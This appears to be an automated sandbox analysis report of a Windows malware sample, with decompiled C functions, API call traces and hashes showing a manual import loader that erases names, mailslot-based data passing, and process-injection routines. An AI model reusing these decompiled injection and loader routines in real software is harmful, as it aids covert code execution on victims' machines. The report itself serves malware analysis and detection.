API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3367774474-0
Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd

APIs

NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
SetLastError.KERNEL32(00000000), ref: 002E3EA7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native

Similarity

Total matches: 236
API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 1449157707-0
Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa

APIs

NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native

Similarity

Total matches: 238
API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3946382534-0
Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536

APIs

NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95
threadsynchronization

Similarity

Total matches: 95
API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
String ID:
API String ID: 2699342322-0
Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82

C-Code - Quality: 100%

			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs

CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9

Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9

TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
CloseHandle.KERNEL32(?), ref: 004016F0
GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
CloseHandle.KERNEL32(?), ref: 00401704
GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95
sleepfile

Similarity

Total matches: 95
API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
String ID: \\.\mailslot\msl0
API String ID: 1001206095-622273203
Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981

C-Code - Quality: 94%

			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs

CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
GetLastError.KERNEL32 ref: 00401126
Sleep.KERNEL32(00000064), ref: 00401131

Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
memset.NTDLL ref: 004011C8

Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213

CloseHandle.KERNEL32(?), ref: 004011E4

Strings

\\.\mailslot\msl0, xrefs: 00401113

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring

Similarity

Total matches: 182
API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
String ID:
API String ID: 1756712956-0
Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b

APIs

PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
StrStrIW.SHLWAPI(00000000), ref: 002E12E4
HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143
librarystringloader

Similarity

Total matches: 143
API ID: lstrlenmemset$GetProcAddressLoadLibrary
String ID: ~
API String ID: 3655391705-1707062198
Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11

C-Code - Quality: 100%

			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs

LoadLibraryA.KERNEL32(?), ref: 004013B6
lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
memset.NTDLL ref: 004013D3
GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
memset.NTDLL ref: 0040143B

Strings

~, xrefs: 00401471

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E3F3A, Relevance: 10.6, APIs: 7, Instructions: 75 Total matches: 204

Similarity

Total matches: 204
API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
String ID:
API String ID: 1755075983-0
Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
CloseHandle.KERNEL32(002E7494), ref: 002E3FEC

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread

Similarity

Total matches: 199
API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
String ID:
API String ID: 2400451634-0
Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775

APIs

InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5

Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038

CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
CloseHandle.KERNEL32 ref: 002E1141
HeapDestroy.KERNEL32 ref: 002E114E

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190
memorysleepfile

Similarity

Total matches: 190
API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
String ID: \\.\mailslot\msl0
API String ID: 2393858888-622273203
Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395

C-Code - Quality: 96%

			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs

CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
GetLastError.KERNEL32 ref: 004010D6

Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE

ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
GetLastError.KERNEL32 ref: 004010A4
Sleep.KERNELBASE(00000064), ref: 004010B7
CloseHandle.KERNEL32(?), ref: 004010CE

Strings

\\.\mailslot\msl0, xrefs: 00401047

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file

Similarity

Total matches: 194
API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
String ID:
API String ID: 1233022807-0
Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca

APIs

CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
GetLastError.KERNEL32(?,002E7494), ref: 002E16F3

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection

Similarity

Total matches: 307
API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 307323562-0
Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed

APIs

memset.NTDLL ref: 002E22F5

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

ResumeThread.KERNELBASE(?), ref: 002E2418

Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81

ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
SuspendThread.KERNELBASE(?), ref: 002E23A1

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

